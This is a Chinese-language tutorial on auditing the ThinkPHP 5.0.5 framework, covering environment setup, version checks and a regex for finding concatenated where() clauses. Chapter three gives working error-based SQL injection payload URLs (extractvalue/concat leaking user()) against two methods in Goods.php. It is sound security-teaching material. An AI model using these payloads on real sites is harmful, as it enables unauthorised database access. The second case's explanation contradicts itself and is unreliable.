ThinkPHP 5.0.5 框架代码审计实战教学文档

文档概述

本教学文档基于一篇对ThinkPHP 5.0.5版本框架的代码审计实践文章，旨在系统性地讲解如何对一个PHP框架进行安全审计。文档将涵盖审计环境搭建、核心审计思路、具体漏洞挖掘案例及利用方法，适用于希望提升代码审计能力的安全研究人员和开发人员。

第一章：审计环境搭建

在进行代码审计之前，一个与目标代码匹配的本地测试环境至关重要。

1. 环境准备：

   • 工具：使用 phpstudy 等集成环境软件快速搭建PHP+MySQL环境。
   • 目录绑定：将框架源代码目录指向本地测试域名（如 127.0.0.1 或 localhost）。

2. 框架配置：

   • 数据库配置：修改 application/database.php 文件中的数据库连接信息（主机名、数据库名、用户名、密码），以匹配本地MySQL环境。
   • 导入SQL文件：将框架所需的数据库SQL文件导入到本地数据库中，确保所有功能可以正常运作。

3. URL重写（伪静态）配置：

   • 为了使ThinkPHP的PATHINFO模式（简洁URL）正常工作，需要在Web服务器（如Apache）中配置重写规则。
   • 在网站根目录的 .htaccess 文件中加入以下规则：

     <IfModule mod_rewrite.c>
     Options +FollowSymlinks -Multiviews
     RewriteEngine On
     RewriteCond %{REQUEST_FILENAME} !-d
     RewriteCond %{REQUEST_FILENAME} !-f
     RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L]
     </IfModule>
     

   • 此配置会将所有不指向真实文件或目录的请求都重定向到 index.php 入口文件，由ThinkPHP统一处理。

第二章：核心审计思路

文章提出了三种核心的审计思路，可以系统性地发现安全问题。

思路一：框架版本识别与已知漏洞挖掘

1. 确定版本号：

   • 在项目文件中搜索关键词 version 或 THINK_VERSION。通常可以在 thinkphp 基础库目录或应用入口文件附近找到定义。
   • 示例：在源码中发现 define('THINK_VERSION', '5.0.5');，从而锁定审计目标为ThinkPHP 5.0.5。

2. 利用已知漏洞：

   • 一旦确定版本号，应立即搜索该版本的历史公开漏洞。可以使用工具（如Seay源代码审计系统、Fortify等）或公开漏洞库（如CNNVD、CNVD、Exploit-DB）。
   • 针对ThinkPHP 5.0.5，应重点排查：
     • SQL注入：特定版本的构造方法漏洞。
     • 文件包含：路由或控制器中的动态包含漏洞。
     • 反序列化漏洞：框架内置的序列化/反序列化功能可能存在的利用点。
     • XSS漏洞：模板引擎的过滤机制是否完善。
     • 越权漏洞：权限验证逻辑缺陷。
     • 文件上传漏洞：上传过滤器的绕过可能。

思路二：查找不安全的代码写法（重点）

这是代码审计中最有效、最直接的方法，重点关注开发者未遵循框架安全规范或直接使用危险函数的情况。

1. 危险的SQL查询构造：
   • 安全写法：使用ThinkPHP推荐的参数绑定或数组条件，能有效防止SQL注入。

     // 安全写法1：使用数组
     where(['id' => $id])
     // 安全写法2：使用参数绑定
     where('id', $id)
     

   • 不安全写法：在 where() 方法中直接进行字符串拼接。这是导致SQL注入的高危操作。

     // 危险写法：直接拼接用户输入
     where('id=' . $id)
     

   • 审计方法：在IDE或代码编辑器中，使用正则表达式全局搜索 where\(.*\.\$。这个正则可以匹配出所有在 where 条件中进行字符串拼接的代码行，极大提高效率。

第三章：实战漏洞审计案例

文章详细分析了两个通过“思路二”发现的SQL注入漏洞。

案例一：ajaxkdata 方法中的SQL注入

1. 漏洞定位：

   • 文件路径：application/index/controller/Goods.php
   • 方法名：ajaxkdata
   • 漏洞代码：

     public function ajaxkdata() {
         $pid = input('pid');
         $data = Db::name('productdata')->where('pid='.$pid)->find();
         // ... 其他代码 ...
     }
     

   • 漏洞分析：该方法直接获取用户输入的 pid 参数，并未经过滤就拼接到了SQL语句的 where 条件中。生成的SQL语句形如：SELECT * FROM wp_productdata WHERE ( pid=4 ) LIMIT 1。

2. 漏洞利用：

   • 构造Payload，通过URL参数注入恶意SQL代码。
   • Payload 1（使用注释符%23截断）：

     http://127.0.0.1/index.php/index/goods/ajaxkdata/pid/4)%20and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))%23
     

   • Payload 2（利用语句完整性）：

     http://127.0.0.1/index.php/index/goods/ajaxkdata/pid/4%20and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))
     

   • 解释：extractvalue 是MySQL用于XML查询的函数，当参数格式错误时会报错，并将第二个参数的内容显示在错误信息中。concat(0x7e, ..., 0x7e) 中的 0x7e 是波浪号 ~ 的十六进制，用于清晰地标记出被泄露的数据（如当前数据库用户）。

案例二：goods 方法中间接导致的SQL注入

1. 漏洞定位：

   • 文件路径：application/index/controller/Goods.php
   • 方法名：goods
   • 漏洞代码：该方法调用了公共函数 ChickIsOpen($pid)。
   • 追溯 ChickIsOpen 函数（位于 application/common.php）：

     function ChickIsOpen($pid) {
         $pro = db('productinfo')->where(array('pid'=>$pid))->find();
         // ... 其他代码 ...
     }
     

   • 注意：虽然 ChickIsOpen 函数内部使用了安全的数组写法 where(array('pid'=>$pid))，但问题出在 goods 方法调用它之前，并未对 $pid 进行有效的过滤或类型转换。

2. 漏洞链与利用：

   • 当请求 goods 方法时，如果传入的 pid 不是一个简单的数字，而是一个包含SQL语句的字符串，虽然数组写法本身安全，但如果框架的底层逻辑或数据库驱动在处理异常参数时存在瑕疵，仍可能导致注入。文章作者通过构造一个能引发数据库报错的Payload来验证。
   • 构造URL：

     http://127.0.0.1/index.php/index/goods/goods/pid/6)%20and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%23
     

   • 关键点：Payload中的 6) 是为了让原始SQL语句的括号提前闭合，然后插入我们自己的恶意语句。%23 是 # 的URL编码，用于注释掉后续可能存在的原始SQL代码，避免语法错误。

第四章：总结与拓展

1. 审计流程总结：
   • 搭环境 -> 定版本 -> 查已知 -> 搜危险写法 -> 跟数据流 -> 验证漏洞。
2. 工具建议：
   • 代码编辑器：PHPStorm、VSCode，具备强大的全局搜索和正则表达式支持。
   • 审计工具：可辅助使用自动化代码审计工具进行初步筛选，但绝不能替代人工分析。
3. 拓展学习：
   • 深入研究ThinkPHP的底层数据库驱动和查询构造器，理解其安全机制和可能的绕过方式。
   • 学习其他常见漏洞模式，如变量覆盖、逻辑越权、SSRF等。
   • 养成阅读官方开发手册的习惯，明确什么是安全的编码实践。

这份文档已经完全提取并系统地组织了链接文章中的核心知识要点。通过遵循本教学文档的步骤，您可以掌握对ThinkPHP框架进行安全审计的基本方法论和实战技巧。